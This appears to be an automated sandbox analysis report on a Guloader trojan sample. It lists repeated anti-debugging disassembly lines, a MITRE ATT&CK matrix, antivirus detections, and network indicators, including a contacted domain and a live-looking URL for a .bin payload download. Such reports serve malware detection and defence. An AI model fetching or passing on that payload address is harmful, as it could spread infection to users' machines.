    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F31E1 mov eax, dword ptr fs:[00000030h]4_2_359F31E1
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359251ED mov eax, dword ptr fs:[00000030h]4_2_359251ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35921131 mov eax, dword ptr fs:[00000030h]4_2_35921131
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35921131 mov eax, dword ptr fs:[00000030h]4_2_35921131
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B136 mov eax, dword ptr fs:[00000030h]4_2_3591B136
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B136 mov eax, dword ptr fs:[00000030h]4_2_3591B136
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B136 mov eax, dword ptr fs:[00000030h]4_2_3591B136
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B136 mov eax, dword ptr fs:[00000030h]4_2_3591B136
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F7120 mov eax, dword ptr fs:[00000030h]4_2_359F7120
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35927152 mov eax, dword ptr fs:[00000030h]4_2_35927152
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5152 mov eax, dword ptr fs:[00000030h]4_2_359F5152
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919148 mov eax, dword ptr fs:[00000030h]4_2_35919148
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919148 mov eax, dword ptr fs:[00000030h]4_2_35919148
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919148 mov eax, dword ptr fs:[00000030h]4_2_35919148
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919148 mov eax, dword ptr fs:[00000030h]4_2_35919148
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B3140 mov eax, dword ptr fs:[00000030h]4_2_359B3140
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B3140 mov eax, dword ptr fs:[00000030h]4_2_359B3140
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B3140 mov eax, dword ptr fs:[00000030h]4_2_359B3140
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B9179 mov eax, dword ptr fs:[00000030h]4_2_359B9179
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h]4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35925096 mov eax, dword ptr fs:[00000030h]4_2_35925096
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D090 mov eax, dword ptr fs:[00000030h]4_2_3594D090
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D090 mov eax, dword ptr fs:[00000030h]4_2_3594D090
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595909C mov eax, dword ptr fs:[00000030h]4_2_3595909C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359AD080 mov eax, dword ptr fs:[00000030h]4_2_359AD080
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359AD080 mov eax, dword ptr fs:[00000030h]4_2_359AD080
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591D08D mov eax, dword ptr fs:[00000030h]4_2_3591D08D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F50D9 mov eax, dword ptr fs:[00000030h]4_2_359F50D9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359490DB mov eax, dword ptr fs:[00000030h]4_2_359490DB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov ecx, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov ecx, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov ecx, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov ecx, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599D0C0 mov eax, dword ptr fs:[00000030h]4_2_3599D0C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599D0C0 mov eax, dword ptr fs:[00000030h]4_2_3599D0C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359450E4 mov eax, dword ptr fs:[00000030h]4_2_359450E4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359450E4 mov ecx, dword ptr fs:[00000030h]4_2_359450E4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E903E mov eax, dword ptr fs:[00000030h]4_2_359E903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E903E mov eax, dword ptr fs:[00000030h]4_2_359E903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E903E mov eax, dword ptr fs:[00000030h]4_2_359E903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E903E mov eax, dword ptr fs:[00000030h]4_2_359E903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C705E mov ebx, dword ptr fs:[00000030h]4_2_359C705E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C705E mov eax, dword ptr fs:[00000030h]4_2_359C705E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B052 mov eax, dword ptr fs:[00000030h]4_2_3594B052
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov ecx, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599D070 mov ecx, dword ptr fs:[00000030h]4_2_3599D070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A106E mov eax, dword ptr fs:[00000030h]4_2_359A106E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5060 mov eax, dword ptr fs:[00000030h]4_2_359F5060
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F539D mov eax, dword ptr fs:[00000030h]4_2_359F539D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597739A mov eax, dword ptr fs:[00000030h]4_2_3597739A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597739A mov eax, dword ptr fs:[00000030h]4_2_3597739A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C13B9 mov eax, dword ptr fs:[00000030h]4_2_359C13B9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C13B9 mov eax, dword ptr fs:[00000030h]4_2_359C13B9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C13B9 mov eax, dword ptr fs:[00000030h]4_2_359C13B9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359433A5 mov eax, dword ptr fs:[00000030h]4_2_359433A5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359533A0 mov eax, dword ptr fs:[00000030h]4_2_359533A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359533A0 mov eax, dword ptr fs:[00000030h]4_2_359533A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DB3D0 mov ecx, dword ptr fs:[00000030h]4_2_359DB3D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F53FC mov eax, dword ptr fs:[00000030h]4_2_359F53FC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF3E6 mov eax, dword ptr fs:[00000030h]4_2_359DF3E6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A930B mov eax, dword ptr fs:[00000030h]4_2_359A930B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A930B mov eax, dword ptr fs:[00000030h]4_2_359A930B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A930B mov eax, dword ptr fs:[00000030h]4_2_359A930B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35917330 mov eax, dword ptr fs:[00000030h]4_2_35917330
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E132D mov eax, dword ptr fs:[00000030h]4_2_359E132D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E132D mov eax, dword ptr fs:[00000030h]4_2_359E132D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F32A mov eax, dword ptr fs:[00000030h]4_2_3594F32A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919353 mov eax, dword ptr fs:[00000030h]4_2_35919353
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919353 mov eax, dword ptr fs:[00000030h]4_2_35919353
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591D34C mov eax, dword ptr fs:[00000030h]4_2_3591D34C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591D34C mov eax, dword ptr fs:[00000030h]4_2_3591D34C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5341 mov eax, dword ptr fs:[00000030h]4_2_359F5341
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35927370 mov eax, dword ptr fs:[00000030h]4_2_35927370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35927370 mov eax, dword ptr fs:[00000030h]4_2_35927370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35927370 mov eax, dword ptr fs:[00000030h]4_2_35927370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C3370 mov eax, dword ptr fs:[00000030h]4_2_359C3370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF367 mov eax, dword ptr fs:[00000030h]4_2_359DF367
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595329E mov eax, dword ptr fs:[00000030h]4_2_3595329E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595329E mov eax, dword ptr fs:[00000030h]4_2_3595329E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5283 mov eax, dword ptr fs:[00000030h]4_2_359F5283
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A92BC mov eax, dword ptr fs:[00000030h]4_2_359A92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A92BC mov eax, dword ptr fs:[00000030h]4_2_359A92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A92BC mov ecx, dword ptr fs:[00000030h]4_2_359A92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A92BC mov ecx, dword ptr fs:[00000030h]4_2_359A92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359352A0 mov eax, dword ptr fs:[00000030h]4_2_359352A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359352A0 mov eax, dword ptr fs:[00000030h]4_2_359352A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359352A0 mov eax, dword ptr fs:[00000030h]4_2_359352A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359352A0 mov eax, dword ptr fs:[00000030h]4_2_359352A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E92A6 mov eax, dword ptr fs:[00000030h]4_2_359E92A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E92A6 mov eax, dword ptr fs:[00000030h]4_2_359E92A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E92A6 mov eax, dword ptr fs:[00000030h]4_2_359E92A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E92A6 mov eax, dword ptr fs:[00000030h]4_2_359E92A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B72A0 mov eax, dword ptr fs:[00000030h]4_2_359B72A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B72A0 mov eax, dword ptr fs:[00000030h]4_2_359B72A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B2D3 mov eax, dword ptr fs:[00000030h]4_2_3591B2D3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B2D3 mov eax, dword ptr fs:[00000030h]4_2_3591B2D3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B2D3 mov eax, dword ptr fs:[00000030h]4_2_3591B2D3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F2D0 mov eax, dword ptr fs:[00000030h]4_2_3594F2D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F2D0 mov eax, dword ptr fs:[00000030h]4_2_3594F2D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359292C5 mov eax, dword ptr fs:[00000030h]4_2_359292C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359292C5 mov eax, dword ptr fs:[00000030h]4_2_359292C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF2F8 mov eax, dword ptr fs:[00000030h]4_2_359DF2F8
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB2F0 mov eax, dword ptr fs:[00000030h]4_2_359CB2F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB2F0 mov eax, dword ptr fs:[00000030h]4_2_359CB2F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359192FF mov eax, dword ptr fs:[00000030h]4_2_359192FF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F52E2 mov eax, dword ptr fs:[00000030h]4_2_359F52E2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35957208 mov eax, dword ptr fs:[00000030h]4_2_35957208
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35957208 mov eax, dword ptr fs:[00000030h]4_2_35957208
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5227 mov eax, dword ptr fs:[00000030h]4_2_359F5227
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DB256 mov eax, dword ptr fs:[00000030h]4_2_359DB256
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DB256 mov eax, dword ptr fs:[00000030h]4_2_359DB256
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919240 mov eax, dword ptr fs:[00000030h]4_2_35919240
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919240 mov eax, dword ptr fs:[00000030h]4_2_35919240
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595724D mov eax, dword ptr fs:[00000030h]4_2_3595724D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35949274 mov eax, dword ptr fs:[00000030h]4_2_35949274
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API    		1
    DLL Side-Loading    		1
    Access Token Manipulation    		1
    Masquerading    		OS Credential Dumping211
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Process Injection    		11
    Virtualization/Sandbox Evasion    		LSASS Memory11
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol1
    Clipboard Data    		1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		1
    Access Token Manipulation    		Security Account Manager2
    File and Directory Discovery    		SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Process Injection    		NTDS23
    System Information Discovery    		Distributed Component Object ModelInput Capture3
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
    Obfuscated Files or Information    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    450707124374000811.exe45%ReversingLabsWin32.Trojan.Guloader
    450707124374000811.exe100%AviraHEUR/AGEN.1337946

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    alfacen.com
    		193.107.36.30
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://alfacen.com/GZgWeuQ77.binfalse
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd450707124374000811.exe, 00000004.00000001.2467393777.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
          		unknown
